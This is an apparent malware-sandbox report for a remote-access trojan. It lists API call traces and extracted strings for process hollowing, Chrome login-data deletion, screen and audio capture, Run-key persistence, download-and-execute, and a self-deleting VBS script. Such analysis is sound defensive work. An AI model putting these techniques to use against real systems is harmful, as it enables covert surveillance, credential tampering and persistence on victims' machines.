                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                    • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                    Similarity
                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                    • String ID: !D@$PowrProf.dll$SetSuspendState
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP$['E
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                    • GetLastError.KERNEL32 ref: 0040BA58
                    Strings
                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                    • UserProfile, xrefs: 0040BA1E
                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    APIs
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                    • GetLastError.KERNEL32 ref: 0041799D
                    Similarity
                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                    • String ID: SeShutdownPrivilege
                    • API String ID: 3534403312-3733053543
                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                    APIs
                    • __EH_prolog.LIBCMT ref: 00409258
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                    • FindClose.KERNEL32(00000000), ref: 004093C1
                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                    • FindClose.KERNEL32(00000000), ref: 004095B9
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    APIs
                    • FindResourceA.KERNEL32 ref: 0041B4B9
                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    APIs
                    • __EH_prolog.LIBCMT ref: 0040966A
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Find$File$CloseFirstH_prologNext
                    APIs
                    • __EH_prolog.LIBCMT ref: 00408811
                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: FileFind$FirstNextsend
                    • String ID: XPG$XPG
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                    • String ID: sJD
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                    • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                    • ExitProcess.KERNEL32 ref: 004432EF
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Process$CurrentExitTerminate
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Clipboard$CloseDataOpen
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • String ID: .
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: lJD
                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                    • HeapFree.KERNEL32(00000000), ref: 004120EE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: Heap$FreeProcess
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: FeaturePresentProcessor
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$InfoLocale_abort_free
                    APIs
                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                    • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                    • API ID: InfoLocale
                    • String ID:
                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                    • DeleteObject.GDI32(00000000), ref: 00418F30
                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                    • DeleteDC.GDI32(00000000), ref: 00418F62
                    • DeleteDC.GDI32(00000000), ref: 00418F65
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                    • GetIconInfo.USER32 ref: 00418FBD
                    • DeleteObject.GDI32(?), ref: 00418FEC
                    • DeleteObject.GDI32(?), ref: 00418FF9
                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                    • DeleteDC.GDI32(?), ref: 0041917C
                    • DeleteDC.GDI32(00000000), ref: 0041917F
                    • DeleteObject.GDI32(00000000), ref: 00419182
                    • GlobalFree.KERNEL32(?), ref: 0041918D
                    • DeleteObject.GDI32(00000000), ref: 00419241
                    • GlobalFree.KERNEL32(?), ref: 00419248
                    • DeleteDC.GDI32(?), ref: 00419258
                    • DeleteDC.GDI32(00000000), ref: 00419263
                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                    • String ID: DISPLAY
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                    • ResumeThread.KERNEL32(?), ref: 00418435
                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                    • GetLastError.KERNEL32 ref: 0041847A
                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                    • ExitProcess.KERNEL32 ref: 0040D7D0
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                    • ExitProcess.KERNEL32 ref: 0040D419
                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                    • lstrcatW.KERNEL32 ref: 00412601
                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                    • Sleep.KERNEL32(000001F4), ref: 00412682
                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                    • SetEvent.KERNEL32 ref: 0041B219
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                    • CloseHandle.KERNEL32 ref: 0041B23A
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    APIs
